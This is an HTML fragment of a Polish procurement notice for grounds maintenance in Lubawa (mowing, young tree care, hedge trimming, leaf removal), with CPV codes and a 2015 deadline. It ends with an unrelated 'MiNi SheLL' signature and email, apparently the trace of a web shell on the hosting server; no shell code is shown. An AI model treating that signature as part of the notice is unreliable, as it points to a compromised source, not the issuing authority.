<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługi świadczone na terenie miasta Lubawa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	Utrzymanie trawników wraz z uprzątnięciem chodników i jezdni.
W zakresie utrzymania trawników wchodzą prace związane z koszeniem trawy, chwastów, a także wykoszeniem trawy wokół drzew i krzewów. Pozostała po koszeniu trawa i samosiewy winny być zabrane (wygrabione) z terenu zielonego, przyległych chodników i jezdni oraz przetransportowane na składowisko odpadów. Przed przystąpieniem do każdego koszenia należy usunąć z trawy: chwasty, kamienie, gruz, puszki metalowe lub inne zanieczyszczenia.
b)	Utrzymanie drzew młodych.
W ramach utrzymania drzew młodych należy wykonać prace polegające na:
- podlewaniu wodą,
- zabezpieczeniu roślin preparatami chemicznymi przed chorobami grzybowymi i szkodnikami,
- usuwaniu suchych, nadłamanych oraz zwisających gałęzi (miejsca po ściętych gałęziach należy zabezpieczyć preparatem grzybobójczym),
- usunięciu odrostów z pni drzew oraz szyj korzeniowych.
Usunięte odrosty i gałęzie drzew należy złożyć w stosy oraz przetransportować na składowisko odpadów.
c)	Utrzymanie żywopłotów liściastych.
Utrzymanie żywopłotów liściastych będzie polegało na wykonaniu cięć formujących żywopłotów, wycięciu suchych, porażonych i połamanych gałęzi oraz wypieleniu chwastów lub skoszeniu trawy wokół żywopłotu, a następnie złożeniu usuniętych elementów w stosy oraz transport na składowisko. Żywopłoty po przycięciu muszą zachować nadal funkcję estetyczną.
d)	Grabienie, uprzątnięcie i wywóz liści.     
W ramach tej części zadania należy wygrabić (uprzątnąć) liście z terenów zielonych, ułożyć w stosy oraz przetransportować na składowisko śmieci..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.41.00-5, 77.34.20.00-9, 77.31.20.00-0, 77.21.15.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com